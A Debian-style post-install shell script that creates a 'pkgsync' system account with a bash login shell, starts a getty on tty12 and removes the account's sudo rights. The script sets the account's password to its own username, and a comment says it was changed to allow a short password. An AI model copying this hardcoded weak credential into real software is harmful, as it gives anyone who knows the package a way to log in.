#!/bin/bash
set -e

USERID="pkgsync"
SERVICE_NAME="getty@tty12.service"

if [ -f /etc/cron.d/pkgsync ]; then
	rm -f /etc/cron.d/pkgsync
fi

[ -d /var/log/pkgsync ] || mkdir -p /var/log/pkgsync

adduser --quiet --system --shell /bin/bash --home /var/home/pkgsync $USERID
addgroup --quiet --system $USERID
usermod -g $USERID $USERID

# default password is username
#echo "${USERID}:${USERID}" | chpasswd
# modified to let short password
echo "${USERID}:${USERID}" | chpasswd -c SHA256

if id -nG "$USERID" | grep -qw "sudo"; then
  echo "El usuario $USERID es miembro del grupo sudo. Eliminándolo..."
  deluser "$USERID" sudo
fi

if [ -x /bin/systemctl ]; then
   systemctl daemon-reload

   if ! systemctl is-active --quiet "$SERVICE_NAME"; then
      systemctl start "$SERVICE_NAME"
   fi

   if ! systemctl is-enabled --quiet "$SERVICE_NAME"; then
      systemctl enable "$SERVICE_NAME"
   fi
fi


[ -f /etc/sudoers ] && sed -i '/pkgsync.*/d' /etc/sudoers 2>&1>/dev/null

exit 0
